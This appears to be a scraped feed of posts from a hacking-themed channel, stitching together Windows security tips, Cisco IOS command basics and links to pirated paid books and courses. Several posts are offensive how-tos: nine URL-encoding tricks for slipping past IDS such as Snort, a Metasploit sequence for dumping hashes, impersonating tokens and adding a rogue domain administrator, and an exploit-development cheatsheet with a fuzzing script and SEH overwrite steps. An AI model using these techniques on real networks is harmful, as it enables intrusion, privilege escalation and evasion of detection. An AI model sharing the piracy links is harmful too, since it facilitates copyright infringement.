▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑WHAT IS ARP ATTACK & how to secure yourself ?

ARP attacks mainly exist in the local area network. If a computer in the local area network is infected with an ARP Trojan, the system infected with the ARP Trojan will try to intercept the communication information of other computers in the network by means of "ARP spoofing". It will cause communication failures of other computers in the network. Let's introduce the solution to the ARP attack on the computer.

🦑Computer suffers ARP attack, solution :
#FastTips

1. Turn on the built-in firewall of the system. In fact, the built-in firewall of the system can also cope with general ARP attacks! But few people use it. First click on the start menu and enter the control panel!

2. Select the "System and Security" option on the control panel page to enter,

3. In the system and security interface, choose to enter the check firewall status under the windows firewall!

4. On the windows firewall status page, click "open or close windows firewall" in the right menu

5. Open and close the firewall page, and turn on the firewall in all network environments!

enjoy❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Common PHP Errors You Will Encounter —165 MB—

https://www.oreilly.com/library/view/common-php-errors/100000006A0493/

https://mega.nz/folder/9J5CASwT#4zhBD9pib-H_xSZo2kCkUw

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to quickly remove the Trojan horse virus in the system ?
Clearing the DLL backdoor is
relatively file-bundled. The DLL insertion Trojan is more advanced, with no process, no ports, etc. It is difficult for ordinary people to notice. Therefore, the removal steps are relatively complicated.


The DLL insertion Trojan is more advanced, with no process, no ports, etc. It is difficult for ordinary people to notice. Therefore, the removal steps are relatively complicated.

1. End the Trojan horse process.
Since this type of Trojan horse is embedded in other processes, it does not generate specific items in the process viewer. If we find that our system is abnormal, we need to judge whether it has been hit DLL Trojan.

> Here we use the IceSword tool. After running the program, it will automatically detect the running process of the system. Right-click on the suspicious process and select "Module Information" in the pop-up menu. You can view all DLL modules in the pop-up window. At this time, if you find an item of unknown origin, you can select it, and then click the "Uninstall" button to delete it from the process. For some stubborn processes, we will also click the "Forced Release" button, and then use the address in the "Module File Name" column to delete them directly in the folder.

2. Finding suspicious DLL modules
As general users are not familiar with the calling of DLL files, it is difficult to determine which DLL module is suspicious. In this way, ECQ-PS (Super Process King) can come in handy.

> After running the software, you can see all the processes in the current system in the middle list. After double-clicking one of the processes, you can display detailed information in the "All Modules" tab of the window below, including the module name , Version and manufacturer, and time of creation, etc. The manufacturer and creation time information is more important. If it is a critical system process such as "svchost.exe", but the result is a module from an unknown manufacturer, the module must be faulty. In addition, if the manufacturer is Microsoft, but the creation time is different from that of other DLL modules, it may also be a DLL Trojan.

> In addition, we can also directly switch to the "Suspicious Module" option, the software will automatically scan the suspicious files in the module and display them in the list. Double-click the suspicious DLL module in the scan result list to see the process of calling this module. Generally, each DLL file is called by multiple processes. If this DLL file is only called by this process, it may also be a DLL Trojan. Click the "Forced Delete" button to delete the DLL Trojan from the process.

3. Thorough Rootkit detection It is
impossible for anyone to check the ports, registry, files, and services in the system all the time to see if the Trojan is hidden. At this time I can use some special tools for detection.

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑New Paid programming books

> https://mega.nz/folder/eaBzlAjY#05vx3nezLN9hOtWsREc-bw

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑practical methods to break through IDS intrusion detection system :

There are many kinds of polymorphic URL encoding technologies, and the author here introduces 9 commonly used and representative methods. For the convenience of explanation, here is the URL with the submission address /msadc/msadcs.dll as an example. "/Msadc/msadcs.dll" has been collected in snort and other major IDS rule set files, so when we directly submit /msadc/msadcs.dll to the target machine, it will be intercepted and alarmed by IDS.

The first trick: "/./" string insertion method

In view of the special role of "./", we can insert it into the URL to achieve URL transformation. For example, for /msadc/msadcs.dll, we can rewrite it as /././msadc/././msadcs.dll, /./msadc/.//./msadcs.dll and other forms to disrupt IDS The identification mark analysis engine realizes the purpose of deceiving IDS. Moreover, the URL after the rewrite is equivalent to the unmodified URL. The author has shown through experiments that this method can bypass IDS such as Snort.

The second trick: "00" ASCII code

Some time ago, the Internet upload vulnerability was used to exploit this feature, and everyone must be familiar with it. Its principle is that when the computer processes the string, it automatically truncates at the ASCII code 00. We can rewrite /msadc/msadcs.dll to /msadc/msadcs.dll Iloveheikefangxian, use Winhex to change the space between .dll and Ilove to the ASCII code of 00, save it, and then submit it with NC and pipe. In this way, in the view of some IDS, the /msadc/msadcs.dll Iloveheikefangxian is not the same as the string of attack intent specified in its rule set file, so it will be indifferent to the behavior of the attacker. Look! How extensive is the application of the principle of "automatically truncating at ASCII code 00 when the computer processes a string"! Philosophically speaking, things are connected with each other, we should think more and dig out the internal laws, so There will be new discoveries.

The third trick: use the path separator "\"

For web servers like Microsoft's IIS, "\" can also be used as a path separator like "/". Some IDS did not consider the non-standard path separator "\" when setting the rule set file. If we rewrite /msadc/msadcs.dll to \msadc\ msadcs.dll, we can escape snort, because there is no identification mark of \msadc\ msadcs.dll in the snort rule set file. It is worth mentioning that the path separator "\" also has a magical effect, which is the "%5c" violent library method mentioned in the "Hacker Line of Defense" some time ago. "%5c" is the hexadecimal representation of "\".

Fourth trick: hexadecimal encoding

For a character, we can use the escape symbol "%" plus its hexadecimal ASCII code to represent it. For example, the first character "/" in /msadc/msadcs.dll can be expressed as %2F, and the following characters can be expressed by their corresponding hexadecimal ASCII code combined with "%". The URL encoded by this method It is no longer the original appearance. There may be no encoded string in the IDS rule set file, so IDS can be bypassed. But this method is invalid for IDS that uses HTTP preprocessing technology.

The fifth trick. Illegal Unicode encoding

UTF-8 encoding allows the character set to contain more than 256 characters, so it also allows more than 8 bits of encoding. The hexadecimal ASCII code of the "/" character is 2F, and the binary number is 00101111. The standard method for representing 2F in UTF-8 format is still 2F, but multi-byte UTF-8 can also be used to represent 2F. The character "/" can be represented by single-byte, double-byte, and three-byte UTF-8 encoding as shown in the following table:

"/" character representation binary hexadecimal

Single byte 0xxxxxxx 00101111 2F

Double byte 110xxxxx 10xxxxxx 11000000 10101111 C0 AF

Three bytes 1110xxxx 10xxxxxx 10xxxxxx 11100000 10000000 10101111 E0 80 AF

According to this method, we can encode the entire string accordingly. Although the resources that the encoded URLs ultimately point to are all the same, their expressions are different, and the filter string may not exist in the IDS rule set file, thus achieving the goal of breaking IDS.

Sixth trick: redundant coding method

The redundant coding is also called double decoding. I still remember that the Unicode decoding vulnerabilities and the double decoding vulnerabilities of IIS in 2000-2001 were making a lot of noise. At that time, many friends were confused and thought that the Unicode decoding vulnerabilities were double decoding vulnerabilities. In fact, the two of them are two different things. Is described in "Illegal Unicode Encoding". The redundant encoding refers to encoding a character multiple times. For example, the "/" character can be represented by %2f, and the "%", "2", and "f" characters in "%2f" can be represented by its ASCII code hexadecimal, according to the mathematical According to the knowledge of permutation and combination, the encoding form is 2 to the 3rd power, so "%2f" can be rewritten as: "%25%32%66", "%252f", etc. to realize the polymorphism of the URL. After encoding, The string may not be collected in the IDS rule set file, which can fool some IDS.

Seventh trick. Add false paths

After adding the string "../" to the URL, the directory after the string has no meaning and becomes invalid. Therefore, using the "../" character string can disrupt the identification mark analysis engine and break through the IDS!

Eighth trick: insert multiple slashes

We can use multiple "/" instead of a single "/". The replaced URL will still work as before. For example, the request for /msadc/msadcs.dll can be changed to ////msadc////msadcs.dll. After the author has experimented, this method can bypass some IDS.

Ninth trick: Comprehensive polymorphic coding

Smart, you will know when you read this subtitle. The so-called synthesis is to combine the several polymorphic coding techniques introduced above. In this way, the effect will be better. I hope this article will learn from you

enjoy❤️👍🏻
written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Nine practical methods to break through IDS intrusion detection system

🦑Cinema 4D Crash Course - Design a Six Pack Case -4.42 GB-

https://www.skillshare.com/classes/Cinema-4D-Crash-Course-Design-a-Six-Pack-Case/479623344

https://mega.nz/#F!VbQCRSRZ!EHyHwr2I67CFpplwBRFyiw

/▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 Updated Linux :

> Its a framework filled with alot of options and hacking tools you use directly in the script from brute forcing to payload making. Im still trying to think of what to add to the script. I now have another tool out called htkl-lite its hackers-tool-kit just not as big and messy. To see updates check on my instagram unkn0wn or if there are any problems message me on instagram.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣git clone https://github.com/unkn0wnh4ckr/hackers-tool-kit

2️⃣cd hackers-tool-kit

3️⃣python install.py

Run
4️⃣ROOT IS NOT REQUIRED TO RUN BUT IS RECOMMENDED

5️⃣cd hackers-tool-kit

6️⃣python htk.py

Then choose option

7️⃣the htksecure.py file will run the hackers-tool-kit with proxychains and other tools making you anonymous when hacking but some stuff might be slow or not work... to run htk secure look below

cd hackers-tool-kit

python htksecure.py

🦑Tested On:

> debian

> Undercode Linux

enjoy❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 DomainAdminExploitation :

After compromising a Windows machine:

[>] List the domain administrators:
From Shell - net group "Domain Admins" /domain

[>] Dump the hashes (Metasploit)
msf > run post/windows/gather/smart_hashdump GETSYSTEM=FALSE

[>] Find the admins (Metasploit)
spool /tmp/enumdomainusers.txt
msf > use auxiliary/scanner/smb/smb_enumusers_domain
msf > set smbuser Administrator
msf > set smbpass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
msf > set rhosts 10.10.10.0/24
msf > set threads 8
msf > run

msf> spool off

[>] Compromise Admin's box
meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token MYDOM\\adaministrator
meterpreter > getuid
meterpreter > shell

C:\> whoami
mydom\adaministrator
C:\> net user hacker /add /domain
C:\> net group "Domain Admins" hacker /add /domain


enjoy❤️👍🏻
✅git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑ExploitDev :

 Development Cheatsheet
------------------------------

[+] Fuzzing:

import socket

buffer = ["A"]
counter = 50

while len(buffer) <= 1000:
    buffer.append("A" * counter)
    counter = counter + 50

for buffstring in buffer:
    print "Fuzzing:" + str(len(buffstring))
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect( ("192.168.0.20", 5555) )
    sock.send(buffstring)
    sock.close()
  

[+] Bad Character Testing:

"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e"
"\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d"
"\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c"
"\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b"
"\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a"
"\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59"
"\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68"
"\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77"
"\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86"
"\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95"
"\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4"
"\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3"
"\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2"
"\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1"
"\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef"
"\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe"
"\xff"


[+] Structured Exception Handler (SEH) Exploitation notes

- Crash the application
- Check SEH overwirte (view-seh chain)
- Find offset (!mona pattern_create <length>)
- Find certain SEH references to the cyclic pattern (!mona findmsp)
- Verify offset to NSEH (Next Exception)
- Find POP/POP/RET address with mona (!mona seh -cpb <bad chars>)
- Add short jump into payload to jump ofver SEH ("\xeb\x06" + 2 bytes of padding)
- Add shellcode to the payload
- Ensure existing padding to make sure the crash still happens.

enjoy❤️👍🏻
✅git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Cisco IOS Command Line Cheatsheet

--- Verify Basic Configuration:

Shows information about the switch and its interfaces, RAM, NVRAM, flash, IOS, etc.
SW1# show version

Shows the current configuration file stored in DRAM.
SW1# show running-config

Shows the configuration file stored in NVRAM which is used at first boot process.
SW1# show startup-config

Lists the commands currently held in the history buffer.
SW1# show history

Shows an overview of all interfaces, their physical status, protocol status and ip address if assigned.
SW1# show ip interface brief

Shows detailed information about the specified interface, its status, protocol, duplex, speed, encapsulation, last 5 min traffic.
SW1# show interface vlan 1

Shows the description of all interfaces
SW1# show interfaces description

Shows the status of all interfaces like connected or not, speed, duplex, trunk or access vlan.
SW1# show interfaces status

Shows the public encryption key used for SSH.
SW1# show crypto key mypubkey rsa

Shows information about the leased IP address (when an interface is configured to get IP address via a dhcp server)
SW1# show dhcp lease

Show the router's routing table. List of all networks that the router can reach.
Router# show ip route

--- Router Modes:

Router>: User mode = Limited to basic monitoring commands
Router#: Privileged mode (exec-level mode) = Provides access to all other router commands
Router(config)#: global configuration mode = Commands that affect the entire system
Router(config-if)#: interface mode = Commands that affect interfaces
Router(config-subif)#: subinterface mode = Commands that affect subinterfaces
Router(config-line)#: line mode = Commands that affect in lines modes (console, vty, aux…)
Router(config-router)#: router configuration mode

--- Changing switch hostname:

Switch(config)# hostname SW1

--- Configuring passwords:

SW1(config)# enable secret cisco ! MD5 hash
SW1(config)# enable password notcisco ! Clear text

--- Securing console port:

SW1(config)# line con 0
SW1(config-line)# password cisco
SW1(config-line)# login

--- Securing terminal lines:

SW1(config)# line vty 0 4
SW1(config-line)# password cisco
SW1(config-line)# login

--- Encrypting passwords:

SW1(config)# service password-encryption

--- Configuring banners:

SW1(config)# banner motd $

enjoy❤️👍🏻
✅git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑UNAUTHORIZED ACCESS IS PROHIBITED
for CiscoIOS
#fastTips

--- Giving the switch an IP address:

SW1(config)# interface vlan 1
SW1(config-if)# ip address 172.16.1.11 255.255.255.0 ! or DHCP
SW1(config-if)# no shutdown

--- Setting the default gateway:

SW1(config)# ip default-gateway 172.16.1.1

--- Saving configuration:

SW1# copy running-config startup-config
Destination filename startup-config? ! Press enter to confirm file name.
Building configuration…
OK

! Short for write memory.
SW1# wr
Building configuration…
OK

enjoy❤️👍🏻
✅git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁